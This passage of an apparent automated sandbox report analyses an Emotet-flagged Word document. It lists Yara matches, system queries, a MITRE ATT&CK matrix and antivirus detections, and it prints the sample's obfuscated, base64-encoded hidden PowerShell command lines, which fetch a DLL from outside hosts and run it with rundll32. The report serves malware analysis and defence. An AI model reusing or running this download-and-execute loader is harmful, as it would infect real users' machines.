cAKQArACcAZgAnACsAKAAnAGEAbAAuAGQAJwArACcAZQAnACkAKwAnAHYAJwArACcALwB3ACcAKwAoACcAcAAtAGkAbgAnACsAJwBjACcAKQArACgAJwBsAHUAJwArACcAZABlACcAKQArACgAJwBzAC8AUgAnACsAJwBsAE0ATwAnACsAJwBiAGYAJwApACsAKAAnADIAagAwACcA
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAZQBUAC0ASQBUAEUATQAgACAAKAAnAHYAJwArACcAQQBSAGkAYQAnACsAJwBCAGwARQA6AGYAJwArACcANwBEACcAKwAnAEgAJwApACAAIAAoACAAWwBUAFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9AHsAMwB9ACIALQBGACAAJwBTAHQAZQBNAC4AaQBPACcALAAnAGMAdABvACcALAAnAHMAeQAnACwAJwByAHkAJwAsACcALgBkAGkAcgBlACcAKQApACAAIAA7ACAAcwBFAHQALQBJAHQARQBNACAAVgBhAFIAaQBBAEIATABlADoAUwBnADIAeABVACAAKAAgACAAWwBUAHkAUABlAF0AKAAiAHsANwB9AHsANAB9AHsANQB9AHsAMQB9AHsAOAB9AHsAMgB9AHsAMAB9AHsANgB9AHsAMwB9ACIALQBGACcAQQBuAEEAZwAnACwAJwBDAEUAUABvAEkAbgAnACwAJwBNACcALAAnAFIAJwAsACcAVABFAG0ALgBOAGUAdAAuAFMARQByACcALAAnAHYASQAnACwAJwBFACcALAAnAFMAWQBzACcALAAnAHQAJwApACAAIAApADsAIAAgACQAWgB6ADgAMgBfADQAMgA9ACQAQgAwADMASQAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQASwA3ADgAUwA7ACQATwAwADAARwA9ACgAJwBFAF8AJwArACcANgBaACcAKQA7ACAAIAAkAEYANwBEAEgAOgA6ACIAYwByAEUAQQBgAFQARQBEAEkAYABSAGAAZQBjAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAZwBUAEwAJwArACcAeABiACcAKwAnAGYAJwApACsAJwB5AHYAJwArACcAawAnACsAJwBlAGcAJwArACcAVAAnACsAJwBHAGMAJwArACgAJwBxAHQAJwArACcAcgBfAGYAJwApACsAKAAnAGUAZwAnACsAJwBUACcAKQApAC4AIgByAGUAUABMAGAAQQBDAEUAIgAoACgAWwBDAEgAQQBSAF0AMQAwADEAKwBbAEMASABBAFIAXQAxADAAMwArAFsAQwBIAEEAUgBdADgANAApACwAWwBzAHQAcgBpAG4AZwBdAFsAQwBIAEEAUgBdADkAMgApACkAKQA7ACQAUAA0ADYAVQA9ACgAJwBBACcAKwAoACcANgA1ACcAKwAnAFEAJwApACkAOwAgACAAJABTAEcAMgBYAFUAOgA6ACIAcwBgAEUAQwB1AGAAUgBpAFQAWQBwAHIATwBUAG8AYABjAGAATwBsACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABJAF8ANwBSAD0AKAAnAEQAJwArACgAJwA3ADUAJwArACcARwAnACkAKQA7ACQAWQB6AGoAcQB4AHgAcQAgAD0AIAAoACcAQwA0ACcAKwAnADYAVAAnACkAOwAkAEwAXwBfAFMAPQAoACgAJwBQAF8AJwArACcAXwAnACkAKwAnAEQAJwApADsAJABVAGsAMQB0AHQAMQBfAD0AJABIAE8ATQBFACsAKAAoACcASAAnACsAKAAnAE8AeAAnACsAJwBMAHgAYgBmACcAKQArACcAeQAnACsAJwB2ACcAKwAoACcAawBIAE8AeAAnACsAJwBHAGMAcQAnACkAKwAnAHQAJwArACgAJwByAF8AZgAnACsAJwBIAE8AeAAnACkAKQAuACIAcgBFAHAAbABgAEEAYwBlACIAKAAoACcASABPACcAKwAnAHgAJwApACwAWwBzAHQAUgBJAE4AZwBdAFsAQwBIAGEAUgBdADkAMgApACkAKwAkAFkAegBqAHEAeAB4AHEAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFQANQA1AEwAPQAoACgAJwBZACcAKwAnADIAMQAnACkAKwAnAFEAJwApADsAJABKAGcANAAxAHMAYwB3AD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQATgBpAG8AbwBpADIAcQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgACcAKQArACgAJwBkACcAKwAnAGIAIAAnACkAKwAoACcAbgBkACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBuAGkAJwApACsAJwBnAGgAJwArACgAJwB0ACcAKwAnAGwAaQBmAGUAbQB1ACcAKwAnAG0AYgAnACkAKwAnAGEAJwArACgAJwBpAC4AJwArACcAYwBsACcAKQArACgAJwB1AGIALwB4ACcAKwAnAC8AMAB3ACcAKwAnAEIAJwApACsAKAAnAEQAMwAnACsAJwAvACEAbgAnACsAJwBzACAAdwAnACkAKwAnAHUAIAAnACsAJwBkACcAKwAnAGIAJwArACgAJwAgAG4AZAAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwAnACsAJwBzAGgAbwAnACkAKwAoACcAcAAuAG4AbwAnACsAJwB3ACcAKQArACcAZgAnACsAKAAnAGEAbAAuAGQAJwArACcAZQAnACkAKwAnAHYAJwArACcALwB3ACcAKwAoACcAcAAtAGkAbgAnACsAJwBjACcAKQArACgAJwBsAHUAJwArACcAZABlACcAKQArACgAJwBzAC8AUgAnACsAJwBsAE0ATwAnACsAJwBiAGYAJwApACsAKAAnADIAagAwACcAKwAnAC8AIQBuAHMAIAB3ACcAKwAnAHUAJwApACsAKAAnACAAJwArACcAZABiACAAJwArAC
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAZQBUAC0ASQBUAEUATQAgACAAKAAnAHYAJwArACcAQQBSAGkAYQAnACsAJwBCAGwARQA6AGYAJwArACcANwBEACcAKwAnAEgAJwApACAAIAAoACAAWwBUAFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9AHsAMwB9ACIALQBGACAAJwBTAHQAZQBNAC4AaQBPACcALAAnAGMAdABvACcALAAnAHMAeQAnACwAJwByAHkAJwAsACcALgBkAGkAcgBlACcAKQApACAAIAA7ACAAcwBFAHQALQBJAHQARQBNACAAVgBhAFIAaQBBAEIATABlADoAUwBnADIAeABVACAAKAAgACAAWwBUAHkAUABlAF0AKAAiAHsANwB9AHsANAB9AHsANQB9AHsAMQB9AHsAOAB9AHsAMgB9AHsAMAB9AHsANgB9AHsAMwB9ACIALQBGACcAQQBuAEEAZwAnACwAJwBDAEUAUABvAEkAbgAnACwAJwBNACcALAAnAFIAJwAsACcAVABFAG0ALgBOAGUAdAAuAFMARQByACcALAAnAHYASQAnACwAJwBFACcALAAnAFMAWQBzACcALAAnAHQAJwApACAAIAApADsAIAAgACQAWgB6ADgAMgBfADQAMgA9ACQAQgAwADMASQAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQASwA3ADgAUwA7ACQATwAwADAARwA9ACgAJwBFAF8AJwArACcANgBaACcAKQA7ACAAIAAkAEYANwBEAEgAOgA6ACIAYwByAEUAQQBgAFQARQBEAEkAYABSAGAAZQBjAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAZwBUAEwAJwArACcAeABiACcAKwAnAGYAJwApACsAJwB5AHYAJwArACcAawAnACsAJwBlAGcAJwArACcAVAAnACsAJwBHAGMAJwArACgAJwBxAHQAJwArACcAcgBfAGYAJwApACsAKAAnAGUAZwAnACsAJwBUACcAKQApAC4AIgByAGUAUABMAGAAQQBDAEUAIgAoACgAWwBDAEgAQQBSAF0AMQAwADEAKwBbAEMASABBAFIAXQAxADAAMwArAFsAQwBIAEEAUgBdADgANAApACwAWwBzAHQAcgBpAG4AZwBdAFsAQwBIAEEAUgBdADkAMgApACkAKQA7ACQAUAA0ADYAVQA9ACgAJwBBACcAKwAoACcANgA1ACcAKwAnAFEAJwApACkAOwAgACAAJABTAEcAMgBYAFUAOgA6ACIAcwBgAEUAQwB1AGAAUgBpAFQAWQBwAHIATwBUAG8AYABjAGAATwBsACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABJAF8ANwBSAD0AKAAnAEQAJwArACgAJwA3ADUAJwArACcARwAnACkAKQA7ACQAWQB6AGoAcQB4AHgAcQAgAD0AIAAoACcAQwA0ACcAKwAnADYAVAAnACkAOwAkAEwAXwBfAFMAPQAoACgAJwBQAF8AJwArACcAXwAnACkAKwAnAEQAJwApADsAJABVAGsAMQB0AHQAMQBfAD0AJABIAE8ATQBFACsAKAAoACcASAAnACsAKAAnAE8AeAAnACsAJwBMAHgAYgBmACcAKQArACcAeQAnACsAJwB2ACcAKwAoACcAawBIAE8AeAAnACsAJwBHAGMAcQAnACkAKwAnAHQAJwArACgAJwByAF8AZgAnACsAJwBIAE8AeAAnACkAKQAuACIAcgBFAHAAbABgAEEAYwBlACIAKAAoACcASABPACcAKwAnAHgAJwApACwAWwBzAHQAUgBJAE4AZwBdAFsAQwBIAGEAUgBdADkAMgApACkAKwAkAFkAegBqAHEAeAB4AHEAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFQANQA1AEwAPQAoACgAJwBZACcAKwAnADIAMQAnACkAKwAnAFEAJwApADsAJABKAGcANAAxAHMAYwB3AD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQATgBpAG8AbwBpADIAcQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgACcAKQArACgAJwBkACcAKwAnAGIAIAAnACkAKwAoACcAbgBkACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBuAGkAJwApACsAJwBnAGgAJwArACgAJwB0ACcAKwAnAGwAaQBmAGUAbQB1ACcAKwAnAG0AYgAnACkAKwAnAGEAJwArACgAJwBpAC4AJwArACcAYwBsACcAKQArACgAJwB1AGIALwB4ACcAKwAnAC8AMAB3ACcAKwAnAEIAJwApACsAKAAnAEQAMwAnACsAJwAvACEAbgAnACsAJwBzACAAdwAnACkAKwAnAHUAIAAnACsAJwBkACcAKwAnAGIAJwArACgAJwAgAG4AZAAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwAnACsAJwBzAGgAbwAnACkAKwAoACcAcAAuAG4AbwAnACsAJwB3ACcAKQArACcAZgAnACsAKAAnAGEAbAAuAGQAJwArACcAZQAnACkAKwAnAHYAJwArACcALwB3ACcAKwAoACcAcAAtAGkAbgAnACsAJwBjACcAKQArACgAJwBsAHUAJwArACcAZABlACcAKQArACgAJwBzAC8AUgAnACsAJwBsAE0ATwAnACsAJwBiAGYAJwApACsAKAAnADIAagAwACcAKwAnAC8AIQBuAHMAIAB3ACcAKwAnAHUAJwApACsAKAAnACAAJwArACcAZABiACAAJwArAC	Jump to behavior

Language, Device and Operating System Detection:

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected Emotet

Show sources

Source: Yara match	File source: 00000016.00000002.2368006651.0000000000250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2369643612.0000000000180000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2342398831.00000000001E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2339483010.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2335393724.0000000000280000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2352976974.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2363852482.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2370162675.00000000003B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2333967935.0000000000280000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2342378229.0000000000160000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2334066475.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2347071363.00000000002B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2485894589.00000000002C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2368454329.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2335519485.0000000000340000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2351415450.0000000000750000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2358322887.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2370274121.0000000000550000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2486292831.0000000002010000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2355550940.00000000006E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2343974004.00000000004A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2368531156.0000000000450000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2360129710.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2338149952.0000000000210000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2343885574.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2338282736.00000000002B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2359551824.0000000000460000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2364687136.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2355569966.0000000000750000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2352906309.0000000000160000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2351067576.0000000000270000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2333875086.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2355670534.0000000000930000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2342497051.0000000000280000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2367980145.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2338123179.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2335352749.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2339586653.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2346880947.00000000001B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2330883211.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2339441337.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2485863461.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2347031079.0000000000280000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2348536550.0000000000250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2360111276.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2358696763.0000000000270000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2360228021.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2352930564.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2351291099.00000000006B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2348563781.00000000002F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2343843229.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2348503069.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 20.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rundll32.exe.750000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.250000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.430000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rundll32.exe.930000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.6b0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.250000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.270000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.rundll32.exe.550000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.270000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.280000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.210000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.2f0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.280000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.280000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rundll32.exe.930000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.2b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.rundll32.exe.270000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.4a0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.rundll32.exe.2010000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.rundll32.exe.450000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.160000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.4a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.rundll32.exe.2010000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.210000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.6b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.280000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.rundll32.exe.460000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.280000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.430000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rundll32.exe.750000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.rundll32.exe.450000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.rundll32.exe.250000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.280000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.rundll32.exe.460000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.2f0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.280000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.280000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.rundll32.exe.550000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.rundll32.exe.250000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.2b0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.rundll32.exe.270000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.400000.0.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation11	Path Interception	Process Injection111	Masquerading21	OS Credential Dumping	Query Registry1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Command and Scripting Interpreter211	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Virtualization/Sandbox Evasion2	LSASS Memory	Security Software Discovery1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer4	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Scripting12	Logon Script (Windows)	Logon Script (Windows)	Disable or Modify Tools11	Security Account Manager	Virtualization/Sandbox Evasion2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol4	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	Exploitation for Client Execution3	Logon Script (Mac)	Logon Script (Mac)	Process Injection111	NTDS	Process Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol15	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	PowerShell3	Network Logon Script	Network Logon Script	Deobfuscate/Decode Files or Information3	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Scripting12	Cached Domain Credentials	File and Directory Discovery2	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Hidden Files and Directories1	DCSync	System Information Discovery15	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Obfuscated Files or Information1	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Rundll321	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
N00048481397007.doc	9%	ReversingLabs

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll	100%	Joe Sandbox ML

Unpacked PE Files

Source	Detection	Scanner	Label	Download
23.2.rundll32.exe.180000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
16.2.rundll32.exe.270000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
18.2.rundll32.exe.750000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
8.2.rundll32.exe.400000.1.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
15.2.rundll32.exe.2f0000.1.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
12.2.rundll32.exe.1e0000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
21.2.rundll32.exe.400000.1.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
10.2.rundll32.exe.2b0000.1.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
11.2.rundll32.exe.400000.1.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
24.2.rundll32.exe.2010000.1.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
16.2.rundll32.exe.6b0000.1.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
19.2.rundll32.exe.460000.1.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
